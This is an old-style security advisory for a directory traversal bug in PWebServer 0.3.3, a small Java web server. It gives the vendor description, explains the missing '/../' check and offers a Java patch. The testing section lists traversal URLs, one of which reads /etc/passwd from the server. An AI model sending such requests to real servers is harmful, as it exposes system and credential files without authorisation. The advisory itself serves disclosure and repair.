Donato Ferrante


Application:  PWebServer
              https://sourceforge.net/projects/pwebserver/

Version:      0.3.3

Bug:          directory traversal bug

Author:       Donato Ferrante
              e-mail: fdonato@autistici.org
              web:    www.autistici.org/fdonato


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

1. Description
2. The bug
3. The code
4. The fix



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

----------------
1. Description:
----------------

Vendor's Description:

"A simple Java multi-threaded Web Server that supports HTTP/1.0 
protocol."


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
2. The bug:
------------

The program doesn't check for malicious patterns like "/../", so an
attacker is able to see and download all the files on the remote
system simply using a browser.



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

-------------
3. The code:
-------------

To test the vulnerability: 

https://[host]:6789/../someFile

or:

https://[host]:6789/../../../../etc/passwd



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

------------
4. The fix:
------------

Bug fixed in the version 0.3.4.

If you want, you can use my following little patch, that should fix
the bug for this version of PWebServer:

..
.
.

( line: 99 ) 
fileName = tokenizedLine.nextToken(); // get the relative file name

/* start of patch */


boolean check = false;
    for(int t = 0; t < fileName.length()-1 && check == false; t++){
          if(fileName.charAt(t) == '.' && fileName.charAt(t+1) == '.')
             check = true;
    }
    if(check == true)
       fileName = "";


/* end of patch */

/* empty filename */
if(fileName.equals("") | fileName.equals("/"))
{

.
.
..



xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx